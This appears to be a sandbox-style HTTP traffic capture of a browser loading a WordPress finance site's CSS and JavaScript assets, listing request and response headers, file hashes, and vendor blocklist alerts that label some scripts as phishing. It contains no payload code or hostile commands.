HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Tue, 11 Jan 2022 12:22:43 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 279
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   279
Md5:    72bfd2d53aa9f299cf392abd69c8b8a6
Sha1:   7f487186ce33a2d1bc60b007c342bd0747cc472c
Sha256: a7bd064a03209d5852f6dbb767df00cac08962728ed8b961b6cba1e465e54d27
                                        
                                            GET /wp-content/plugins/stripe-payments/public/assets/css/public.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 21 Mar 2022 05:32:36 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1195
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1195
Md5:    3d213908fe5fb6d51972c9576cb70afa
Sha1:   ee9d05f6948729e9b35456f06072ffa155e5e6d9
Sha256: 404082f0c1289d8b45211b55e2967db60d7654f2277bec1adab2dec5a3926edf
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3554
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (18854)
Size:   3554
Md5:    23d0cda7fbd7f269a200dfff8ee211c6
Sha1:   497cc19819270e7a3795ab61e775c130ac7b255a
Sha256: 299d22db4a8362551089748bb93645f190469be3b392fa206b9872bd298bb41b
                                        
                                            GET /wp-content/uploads/elementor/css/custom-frontend-lite.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 12:02:22 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 11467
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65536), with no line terminators
Size:   11467
Md5:    de0a3b4cfa50c6250fcae2e841d308c1
Sha1:   de881601ebbc86cc3edb2d4d19c8ccf4bd66f010
Sha256: a0992c4ef90ba89f416113c0c6dc897444a76c14b55cd3c57a7caf09f3680160
                                        
                                            GET /wp-content/uploads/elementor/css/post-5.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 11:59:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 338
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1494), with no line terminators
Size:   338
Md5:    a38833649aee38c839e70c45cf77eab9
Sha1:   531456a09a87cb4cb4ee40794c978c9437aadd34
Sha256: bf0f7b2aea27e7889940c290bb6f361261def31415057f4f8119163197d834b3
                                        
                                            GET /wp-content/uploads/hummingbird-assets/62c5bd855a07086694cec358dc8b97dd.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
x-powered-by: PHP/7.2.34
cache-control: max-age=3600, must-revalidate
hummingbird-cache: Served
content-length: 1138
content-encoding: br
vary: Accept-Encoding
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text
Size:   1138
Md5:    771b7d38176d4117a8677c87c91ac101
Sha1:   90f425477018085cc060415c19b08c33550e5b26
Sha256: 6fceca53b30ff562d7d1ad0c6745fde650d08301e33fefdda37be0447c6e0c6b
                                        
                                            GET /wp-includes/js/jquery/jquery.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Fri, 04 Nov 2022 18:13:57 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 32486
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (57404)
Size:   32486
Md5:    079bd18335ced970c278ca67bdd02a1c
Sha1:   17899d62843cb4cb5fe067675a82e34e389d7066
Sha256: 1a92b908c7efe886b48fa7ace0384525069dab0c585f85550fe9799f0a12fe00

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 12 Sep 2022 14:53:32 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 6175
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (11834)
Size:   6175
Md5:    ad9a0acc74d703c631bd588a2a25174d
Sha1:   97c071258f83682d3f70e1c81472a27c52c2b09d
Sha256: 19e727fa70ff2d98e4a3ffd33c44394f22c36d6b214d06c77205e29cba3660f7

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/video-popup/js/YouTubePopUp.jquery.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Fri, 04 Nov 2022 18:13:56 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3248
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (7928), with CRLF, LF line terminators
Size:   3248
Md5:    fb83d91c4a414177379f38716d6c1809
Sha1:   2a591fa08f588a6142ae1e915321893083473be5
Sha256: ab0edcd305fc0f7ec923979e31ae5f3df3a74698e35041396a4d38cee1df9496

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/video-popup/js/YouTubePopUp.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Tue, 11 Jan 2022 12:22:43 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1545
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF, LF line terminators
Size:   1545
Md5:    0852648646af5f4c849b2fde4c32c567
Sha1:   4ad1becf8162081e8c11c8d6f68f88c3c87b59cd
Sha256: 866f1fa457b3ebe98585a1121e8e85e8b80e7573cb39d3ee217613fa2a51add5

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/stock-market-ticker/assets/stockdio-wp.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 27 Dec 2021 10:39:44 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4254
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (6787), with CRLF, LF line terminators
Size:   4254
Md5:    8dda53a0928c12064eda9228d1b4c83e
Sha1:   d9a390405841546929ea86f0e39777cd4f716c86
Sha256: 7c4d0111ce008644fd69861203496ea4404f29b109e6c322f291465933c3d007

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/stockdio-historical-chart/assets/stockdio_chart_historical-wp.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 27 Dec 2021 10:24:24 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4260
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (6787), with CRLF, LF line terminators
Size:   4260
Md5:    e2cb082d3a8b14ed950ba26da1e62614
Sha1:   4204ec21dcb7078d0651206b23b6919efea98217
Sha256: 36ae889e9de9dfba52c44151e1f5178e991fadfb57194df3435a3f5caf495dd6

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "6022132A52444BDE22CF48DA37C6384FC07EDF18E0EF6AFB05FBE715A9ADB8F3"
Last-Modified: Thu, 24 Nov 2022 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Sat, 26 Nov 2022 04:08:04 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            GET /wp-content/themes/profitcrow/pagination.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 29 Dec 2021 12:11:08 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2323
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document, ASCII text, with CRLF, LF line terminators
Size:   2323
Md5:    282e81c5dc42399f44033b488ecf3f15
Sha1:   da4c08cb9a36f751e45ba244f4f33fe9315dad3c
Sha256: 568de54b6ab279b0b6c18d267028eddfef996ee8538886bd07dc08bd17ecfd80

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/uploads/elementor/css/global.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 12:02:22 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1274
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (6697)
Size:   1274
Md5:    fc6edda31e164cee7091e25022bf94dd
Sha1:   689541cb538ad30d128ed13bfdded51fad82d3e8
Sha256: 704545d1d0d5ef3cc50b0cb5301da68ff6669f1cf1a734b05be20f8198a24530
                                        
                                            GET /wp-content/uploads/elementor/css/post-6.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Sat, 02 Apr 2022 09:31:25 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2376
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (27484), with no line terminators
Size:   2376
Md5:    4f4bcac502200ba217a1be604293d1a3
Sha1:   06d56236cdec9f49e3b84594b1b8daf58367eb37
Sha256: cbe9d9b56f6ec932e87ab0279b0c85badb01c3739b2848a9e2d3bf58513d806e
                                        
                                            GET /wp-content/uploads/elementor/css/post-8.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 21 Mar 2022 05:11:17 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 597
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1769)
Size:   597
Md5:    3e7491096c099cda879eb7fabf1fd4d2
Sha1:   4e1b0a8a39c9f7fed39297e7224425d4ac8fa0ae
Sha256: c84494234c88ac816adedaf41cc2b81632d90f027920fd0bf2b98ea79edb9e64
                                        
                                            GET /wp-content/uploads/elementor/css/post-66.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 28 Mar 2022 10:38:18 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1099
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (9093), with no line terminators
Size:   1099
Md5:    c091095a23032852d0fb1e3b99c68061
Sha1:   090ecb4cdab14e79a8c1fcce9a50440c9105b191
Sha256: bde4854b85bcc99dd3785e0589f4ea9b3368620d84c992b38a48a5f5dfd0c83d
                                        
                                            GET /wp-content/themes/profitcrow/style.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Fri, 11 Mar 2022 05:54:28 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4226
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   4226
Md5:    d7e88376bb05c54b033792ab7f6f513b
Sha1:   3ffaf2240fbbf738e7727ba1fd23e83dcd50987f
Sha256: 0d1923b7fc22037ddbafa26ffc8a91264fb08716aacccfb9960eb2ba67cbebb7
                                        
                                            GET /wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:09:26 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 7374
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (1646)
Size:   7374
Md5:    806afc62d640eb03fccbd5fe46ed8666
Sha1:   31259bb9e403fbe379125ea0c562ac11d76dc4d7
Sha256: f7ceb3661377e98e71ccebe4d91336ac77e4e62a84bff79a1e6f865f3d00c26f
                                        
                                            GET /wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 30 Sep 2020 01:23:06 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2394
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (11256), with no line terminators
Size:   2394
Md5:    ce94f62588d05264ac0148712111cb11
Sha1:   518bcd922f54169aeb199c0ccbc5877165ac218e
Sha256: 84ab658a69c39f424be0b27f61d612447d01606fce33beb962cbea53627d8c81
                                        
                                            GET /wp-content/themes/twentytwentyone/style.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 19 Jul 2021 00:45:00 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 21920
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (403)
Size:   21920
Md5:    62daf70bcac352a086ee7c6c0498068e
Sha1:   c8d6502c4f964874a0016223cf246e1dd81528e7
Sha256: f15ba3c042055ec36a3714964cce47932b19c5f428e696d4630225c315944e31
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 12133
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (57726)
Size:   12133
Md5:    f463afd8661ddc733305df1f0cbdaff2
Sha1:   77262f0209e75e340eb7014aba9cd8d69966032f
Sha256: c4b6541be58a0ca61549cd4562850315077880c459c019f01e835cf2d7b764de
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
